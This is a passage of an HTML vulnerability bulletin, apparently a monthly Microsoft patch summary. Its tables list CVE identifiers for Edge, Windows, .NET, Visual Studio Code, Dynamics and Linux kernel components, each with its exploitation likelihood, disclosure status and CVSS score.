UI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8022">CVE-2026-8022</a></td><td><p>Chromium: CVE-2026-8022 Inappropriate implementation in MHTML</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33111">CVE-2026-33111</a></td><td><p>Copilot Chat (Microsoft Edge) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7896">CVE-2026-7896</a></td><td><p>Chromium: CVE-2026-7896 Integer overflow in Blink</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7897">CVE-2026-7897</a></td><td><p>Chromium: CVE-2026-7897 Use after free in Mobile</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7905">CVE-2026-7905</a></td><td><p>Chromium: CVE-2026-7905 Insufficient validation of untrusted input in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7912">CVE-2026-7912</a></td><td><p>Chromium: CVE-2026-7912 Integer overflow in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7913">CVE-2026-7913</a></td><td><p>Chromium: CVE-2026-7913 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7915">CVE-2026-7915</a></td><td><p>Chromium: CVE-2026-7915 Insufficient data validation in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7931">CVE-2026-7931</a></td><td><p>Chromium: CVE-2026-7931 Insufficient validation of untrusted input in iOS</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7941">CVE-2026-7941</a></td><td><p>Chromium: CVE-2026-7941 Insufficient validation of untrusted input in Mobile</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7993">CVE-2026-7993</a></td><td><p>Chromium: CVE-2026-7993 Insufficient validation of untrusted input in Payments</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-8020">CVE-2026-8020</a></td><td><p>Chromium: CVE-2026-8020 Uninitialized Use in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42838">CVE-2026-42838</a></td><td><p>Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42891">CVE-2026-42891</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35429">CVE-2026-35429</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40416">CVE-2026-40416</a></td><td><p>Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41107">CVE-2026-41107</a></td><td><p>Microsoft Edge (Chromium-based) Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr></tbody></table><p></p><p></p><h3>Developer Tools vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42826">CVE-2026-42826</a></td><td><p>Azure DevOps Information Disclosure Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>10.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32175">CVE-2026-32175</a></td><td><p>.NET Core Tampering Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>4.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32177">CVE-2026-32177</a></td><td><p>.NET Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35433">CVE-2026-35433</a></td><td><p>.NET Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42899">CVE-2026-42899</a></td><td><p>ASP.NET Core Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41109">CVE-2026-41109</a></td><td><p>GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41094">CVE-2026-41094</a></td><td><p>Microsoft Data Formulator Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41613">CVE-2026-41613</a></td><td><p>Visual Studio Code Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41612">CVE-2026-41612</a></td><td><p>Visual Studio Code Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41611">CVE-2026-41611</a></td><td><p>Visual Studio Code Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41610">CVE-2026-41610</a></td><td><p>Visual Studio Code Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.3</p></td></tr></tbody></table><h3>ESU vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54518">CVE-2025-54518</a></td><td><p>AMD: CVE-2025-54518 CPU OP Cache Corruption</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41095">CVE-2026-41095</a></td><td><p>Data Deduplication Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35424">CVE-2026-35424</a></td><td><p>Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40377">CVE-2026-40377</a></td><td><p>Microsoft Cryptographic Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34329">CVE-2026-34329</a></td><td><p>Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41097">CVE-2026-41097</a></td><td><p>Secure Boot Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33839">CVE-2026-33839</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34330">CVE-2026-34330</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34331">CVE-2026-34331</a></td><td><p>Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35423">CVE-2026-35423</a></td><td><p>Windows 11 Telnet Client Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>5.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34344">CVE-2026-34344</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34345">CVE-2026-34345</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35416">CVE-2026-35416</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41088">CVE-2026-41088</a></td><td><p>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34343">CVE-2026-34343</a></td><td><p>Windows Application Identity (AppID) Subsystem Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35418">CVE-2026-35418</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33835">CVE-2026-33835</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34337">CVE-2026-34337</a></td><td><p>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40407">CVE-2026-40407</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40397">CVE-2026-40397</a></td><td><p>Windows Common Log File System Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34336">CVE-2026-34336</a></td><td><p>Windows DWM Core Library Information Disclosure Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33834">CVE-2026-33834</a></td><td><p>Windows Event Logging Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32209">CVE-2026-32209</a></td><td><p>Windows Filtering Platform (WFP) Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35421">CVE-2026-35421</a></td><td><p>Windows GDI Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40403">CVE-2026-40403</a></td><td><p>Windows Graphics Component Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33841">CVE-2026-33841</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35420">CVE-2026-35420</a></td><td><p>Windows Kernel Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34339">CVE-2026-34339</a></td><td><p>Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34341">CVE-2026-34341</a></td><td><p>Windows Link-Layer Discovery Protocol (LLDP) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33838">CVE-2026-33838</a></td><td><p>Windows Message Queuing (MSMQ) Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32161">CVE-2026-32161</a></td><td><p>Windows Native WiFi Miniport Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41089">CVE-2026-41089</a></td><td><p>Windows Netlogon Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34342">CVE-2026-34342</a></td><td><p>Windows Print Spooler Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34340">CVE-2026-34340</a></td><td><p>Windows Projected File System Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40398">CVE-2026-40398</a></td><td><p>Windows Remote Desktop Services Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21530">CVE-2026-21530</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32170">CVE-2026-32170</a></td><td><p>Windows Rich Text Edit Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40410">CVE-2026-40410</a></td><td><p>Windows SMB Client Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35415">CVE-2026-35415</a></td><td><p>Windows Storage Spaces Controller Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40414">CVE-2026-40414</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40401">CVE-2026-40401</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40413">CVE-2026-40413</a></td><td><p>Windows TCP/IP Denial of Service Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35422">CVE-2026-35422</a></td><td><p>Windows TCP/IP Driver Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34351">CVE-2026-34351</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40399">CVE-2026-40399</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34334">CVE-2026-34334</a></td><td><p>Windows TCP/IP Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40406">CVE-2026-40406</a></td><td><p>Windows TCP/IP Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33837">CVE-2026-33837</a></td><td><p>Windows TCP/IP Local Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40415">CVE-2026-40415</a></td><td><p>Windows TCP/IP Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42825">CVE-2026-42825</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34338">CVE-2026-34338</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40382">CVE-2026-40382</a></td><td><p>Windows Telephony Service Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40380">CVE-2026-40380</a></td><td><p>Windows Volume Manager Extension Driver Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40408">CVE-2026-40408</a></td><td><p>Windows WAN ARP Driver Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34333">CVE-2026-34333</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34347">CVE-2026-34347</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35417">CVE-2026-35417</a></td><td><p>Windows Win32k Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr></tbody></table><h3>Mariner vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7598">CVE-2026-7598</a></td><td><p>libssh2 userauth.c userauth_password integer overflow</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43870">CVE-2026-43870</a></td><td><p>Apache Thrift: Node.js web_server.js multi-vulnerability</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43868">CVE-2026-43868</a></td><td><p>Apache Thrift: Rust implementation vulnerable to CVE-2020-13949 pattern</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43869">CVE-2026-43869</a></td><td><p>Apache Thrift: TSSLTransportFactory.java hostname verification</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.3</p></td></tr></tbody></table><h3>Microsoft Dynamics vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33821">CVE-2026-33821</a></td><td><p>Microsoft Dynamics 365 Customer Insights Elevation of Privilege Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40417">CVE-2026-40417</a></td><td><p>Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42898">CVE-2026-42898</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42833">CVE-2026-42833</a></td><td><p>Microsoft Dynamics 365 On-Premises Remote Code Execution Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40374">CVE-2026-40374</a></td><td><p>Microsoft Power Automate Desktop Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><p></p><p></p><p></p><h3>Open Source Software vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31706">CVE-2026-31706</a></td><td><p>ksmbd: validate num_aces and harden ACE walk in smb_inherit_dacl()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31723">CVE-2026-31723</a></td><td><p>usb: gadget: f_subset: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31724">CVE-2026-31724</a></td><td><p>usb: gadget: f_eem: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43053">CVE-2026-43053</a></td><td><p>xfs: close crash window in attr dabtree inactivation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43048">CVE-2026-43048</a></td><td><p>HID: core: Mitigate potential OOB by removing bogus memset()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31777">CVE-2026-31777</a></td><td><p>ALSA: ctxfi: Check the error for index mapping</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31722">CVE-2026-31722</a></td><td><p>usb: gadget: f_rndis: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43036">CVE-2026-43036</a></td><td><p>net: use skb_header_pointer() for TCPv4 GSO frag_off check</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>5.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31769">CVE-2026-31769</a></td><td><p>gpib: fix use-after-free in IO ioctl handlers</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31707">CVE-2026-31707</a></td><td><p>ksmbd: validate response sizes in ipc_validate_msg()</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-31725">CVE-2026-31725</a></td><td><p>usb: gadget: f_ecm: Fix net_device lifecycle with device_move</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-43049">CVE-2026-43049</a></td><td><p>HID: logitech-hidpp: Prevent use-after-free on force feedback initialisation failure</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>7.0</p></td></tr><tr><td><a 